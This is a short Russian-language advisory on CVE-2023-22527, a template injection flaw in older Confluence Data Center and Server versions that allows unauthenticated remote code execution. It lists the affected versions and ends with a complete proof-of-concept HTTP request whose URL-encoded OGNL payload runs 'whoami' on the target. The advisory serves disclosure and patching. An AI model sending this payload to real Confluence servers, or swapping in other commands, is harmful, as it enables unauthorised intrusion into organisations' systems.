
Критическая уязвимость удалённого выполнения кода (RCE) (CVE-2023-22527) была обнаружена в Confluence Server и Data Center.
Уязвимость внедрения шаблонов в старых версиях Confluence Data Center и Server позволяет неаутентифицированному злоумышленнику добиться удалённого выполнения кода (RCE) на затронутом экземпляре. Пользователям, использующим уязвимую версию, необходимо немедленно принять меры. Большинство последних поддерживаемых версий Confluence Data Center и Server не подвержены этой уязвимости, поскольку она была устранена в ходе регулярных обновлений версий. Тем не менее, Atlassian рекомендует пользователям установить последнюю версию, чтобы защитить свои экземпляры от некритичных уязвимостей, перечисленных в январском бюллетене безопасности Atlassian.
| Продукт | Затронутые версии |
|---|
| Confluence Data Center и Server | 8.0.x 8.2.x 8.3.x 8.4.x 8.5.0-8.5.3 |
POST /template/aui/text-inline.vm HTTP/1.1
Host: {HOST_NAME}
Content-Type: application/x-www-form-urlencoded
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22whoami%22%7D%29%29
